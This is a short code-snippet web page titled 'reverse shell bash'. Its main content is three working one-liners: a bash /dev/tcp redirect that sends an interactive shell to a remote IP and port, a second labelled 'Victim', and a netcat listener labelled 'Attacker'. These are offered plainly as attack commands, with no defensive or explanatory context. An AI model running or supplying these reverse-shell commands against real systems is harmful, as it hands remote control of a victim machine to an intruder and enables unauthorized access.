Search
 
SCRIPT & CODE EXAMPLE
 

SHELL

reverse shell bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Comment

how to reverse shell

/bin/bash -i > /dev/tcp/0.0.0.0/9000 0<&1 2>&1 # Victim
Comment

how to reverse shell

nc -l -p 9000 -vvv # Attacker
Comment

PREVIOUS NEXT
Code Example
Shell :: rpm extract 
Shell :: ssh key gen 
Shell :: github ssh key 
Shell :: git restore file 
Shell :: check who is logged in to system linux 
Shell :: github push local branch to remote 
Shell :: git rm --cached 
Shell :: Find last digit of a number in c# 
Shell :: how to remove blank lines in bash 
Shell :: scan and print all keys redis shell 
Shell :: how to update composer in laravel 
Shell :: docker compose stop and start only specific 
Shell :: check connected wifi details on kali 
Shell :: install nvim 
Shell :: remi repo 
Shell :: install python docker 
Shell :: source command in shell script 
Shell :: git submodule push current branch to master 
Shell :: git clone repository 
Shell :: how to delete files from command line 
Shell :: git clone permission denied 
Shell :: remove folder and contents linux 
Shell :: linux terminal show processes 
Shell :: start arangodb 
Shell :: Unzip all zip files in a proper directory 
Shell :: dos view all files 
Shell :: gnutls_handshake() failed: Error in the pull function 
Shell :: powershell allow execution 
Shell :: edit text file bash 
Shell :: Bell char 
ADD CONTENT
Topic
Content
Source link
Name
7+1 =